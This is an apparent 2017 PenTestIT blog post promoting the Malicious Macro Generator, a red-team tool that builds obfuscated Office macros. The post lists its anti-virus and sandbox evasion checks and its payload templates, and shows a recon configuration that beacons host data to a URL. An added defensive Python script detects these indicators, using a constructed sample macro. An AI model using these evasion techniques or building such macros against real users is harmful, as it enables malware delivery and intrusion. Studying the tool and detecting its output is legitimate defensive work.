The Malicious Macro Generator!

2017-08-18T05:17:18
ID PENTESTIT:5546F926E36C8F2E3903A762E1F7E962
Type pentestit
Reporter Black
Modified 2017-08-18T05:17:18

Description

PenTestIT RSS Feed

I'm sure you remember my older posts about the malicious Office document generator and the Office exploitation toolkit. Just a refresher: Luckystrike is an open source PowerShell script that helps you create malicious Microsoft Office documents, and MicroSploit is an open source shell script that helps you create custom Microsoft Office based backdoors using the Metasploit framework. Now there is a new and improved entrant in this market of red teaming tools: the Malicious Macro Generator. It sure does take things up a notch!

Malicious Macro Generator

What is the Malicious Macro Generator?

The Malicious Macro Generator is an open source Python script that generates obfuscated macros with built-in anti-virus and sandbox evasion techniques. The only drawback I found with MicroSploit was that it depends on exploits being added to the Metasploit framework, and with Luckystrike that it could generate only .xls payloads. This changes with the Malicious Macro Generator: it simply creates macros, and where and how you use them is completely up to you. The cherry on top is that it does so with some nice obfuscation and evasion techniques. So now you must be interested in the evasion techniques in use, right? Without much ado, here they are:

Malicious Macro Generator evasion techniques:

These are the currently supported anti-virus and sandbox evasion techniques:

  • Domain check: The macro fetches the USERDOMAIN environment variable and compares it with a predefined one. If they match, the final payload is executed.
  • Disk check: The macro uses WMI to read the total size of the C: disk, since VMs and test machines normally use a small disk.
  • Memory check: The macro looks at the total memory size, since VMs and test machines are usually given fewer resources.
  • Uptime check: The macro uses the LastBootUpTime property of the Win32_OperatingSystem WMI class to fetch the system uptime. Sandboxes will return a short uptime.
  • Process check: The macro also uses WMI, this time the Win32_Process class, to check whether a specific process is running (for example, outlook.exe).

Malicious Macro Generator payload templates:

These are the templates included with the macro generator:

  • wmi-evasion-domain-template.vba
  • recon-template.vba: Transmits data about the remote host, such as the process list.
  • generic-cmd-template.vba: Executes code using Wscript.
  • generic-cmd-evasion-template.vba
  • wmi-template.vba
  • recon-rename-wmi-cmd-evasion.vba
  • wmi-evasion-process-template.vba

These come in handy when you actually create macros using the tool.

Using the Malicious Macro Generator:

This open source Python script is easy to use and does not need an extensive installation procedure or many packages. In this example, I am using the recon template to generate a generic reconnaissance module:

python MMG.py configs/recon.json recon.vba
MMG.Malicious Macro Generator v2.0 - RingZer0 Team
Author: Mr.Un1k0d3r mr.un1k0d3r@gmail.com

[+] Loading the following payload:

Recon payload

[+] "recon.vba" successfully saved to the disk.
[+] Generation completed.

If you open the recon.vba file, you will see what you have created. This is what I have in my configs/recon.json file:

{
    "description": "Recon payload",
    "template": "templates/payloads/recon-template.vba",
    "varcount": 150,
    "encodingoffset": 4,
    "chunksize": 200,
    "encodedvars": {
        "URL": "http://pentestit.com"
    },
    "vars": [],
    "evasion": ["encoder"],
    "payload": ""
}

As you can see, on successful execution this payload will send an MSXML2.ServerXMLHTTP POST to the URL in encodedvars, which here is this blog.
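The environment checks listed above and the ServerXMLHTTP beacon of the recon template leave recognisable strings in the macro source, which is what a defender triaging extracted VBA (for example, from olevba output) can key on. The following Python script is an added example written for this post; it is not part of MMG or of the original article. The post names USERDOMAIN, LastBootUpTime, Win32_OperatingSystem and Win32_Process; the Win32_LogicalDisk and Win32_ComputerSystem classes for the disk and memory checks are assumptions, and both sample macros are constructed test inputs rather than MMG output. Because the "encoder" evasion encodes strings (the encodedvars, encodingoffset and chunksize settings in the config), the indicator strings may exist only at run time, so the script also counts Chr() calls as a cheap proxy for string decoding and flags heavy use for manual review.

```python
"""Static triage of VBA macro source for the sandbox-evasion and beacon
indicators described in the post. Added example, not part of MMG."""
import re

# Indicator name -> pattern over the macro source (matched case-insensitively).
# USERDOMAIN, LastBootUpTime, Win32_OperatingSystem and Win32_Process come from
# the post; Win32_LogicalDisk and Win32_ComputerSystem are assumed here as the
# usual WMI classes behind the disk-size and memory-size checks.
INDICATORS = {
    "domain_check":  re.compile(r'Environ\s*\(\s*"USERDOMAIN"\s*\)', re.I),
    "disk_check":    re.compile(r"Win32_LogicalDisk", re.I),
    "memory_check":  re.compile(r"Win32_ComputerSystem|TotalPhysicalMemory", re.I),
    "uptime_check":  re.compile(r"LastBootUpTime|Win32_OperatingSystem", re.I),
    "process_check": re.compile(r"Win32_Process\b", re.I),
    "wmi_access":    re.compile(r"winmgmts:", re.I),
    "http_beacon":   re.compile(r"MSXML2\.(?:Server)?XMLHTTP", re.I),
    "shell_exec":    re.compile(r"WScript\.Shell|\bShell\s*\(", re.I),
}
EVASION = {"domain_check", "disk_check", "memory_check", "uptime_check", "process_check"}
ACTION = {"http_beacon", "shell_exec"}

# Chr()/ChrW() density is a proxy for run-time string decoding: an encoded
# macro may show none of the indicators above yet still be worth a look.
CHR_CALL = re.compile(r"\bChrW?\s*\(", re.I)
CHR_THRESHOLD = 4


def triage_macro(source: str) -> dict:
    """Return the indicators found in one macro plus an overall verdict."""
    hits = sorted(name for name, pat in INDICATORS.items() if pat.search(source))
    chr_calls = len(CHR_CALL.findall(source))
    found = set(hits)
    if found & EVASION and found & ACTION:
        verdict = "likely_evasive"   # environment check paired with an action
    elif found or chr_calls >= CHR_THRESHOLD:
        verdict = "review"           # partial evidence or heavy string encoding
    else:
        verdict = "clean"
    return {"indicators": hits, "chr_calls": chr_calls, "verdict": verdict}


# Constructed sample carrying the indicator strings the post describes.
# It is test input for the detector, not a working macro and not MMG output.
SUSPICIOUS_MACRO = r'''
Sub AutoOpen()
    dom = Environ("USERDOMAIN")
    Set w = GetObject("winmgmts:\\.\root\cimv2")
    For Each os In w.ExecQuery("SELECT LastBootUpTime FROM Win32_OperatingSystem")
        boot = os.LastBootUpTime
    Next
    For Each d In w.ExecQuery("SELECT Size FROM Win32_LogicalDisk WHERE DeviceID='C:'")
        sz = d.Size
    Next
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112)
    Set h = CreateObject("MSXML2.ServerXMLHTTP")
End Sub
'''

# Constructed benign macro: ordinary worksheet formatting, no WMI or network use.
BENIGN_MACRO = '''
Sub FormatReport()
    Range("A1:D20").Font.Bold = True
    ActiveSheet.Name = "Summary"
End Sub
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_MACRO), ("benign", BENIGN_MACRO)):
        print(label, triage_macro(src))
```

The verdict logic deliberately requires both an environment check and an action (beacon or shell) before calling a macro "likely_evasive": legitimate inventory macros do query WMI, and a lone `Environ("USERDOMAIN")` is common in corporate templates, so either alone only earns "review".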

Download Malicious Macro Generator:

The current version of the Malicious Macro Generator can be checked out from its Git repository. You should already have most of the Python packages it needs.

The post The Malicious Macro Generator! appeared first on PenTestIT.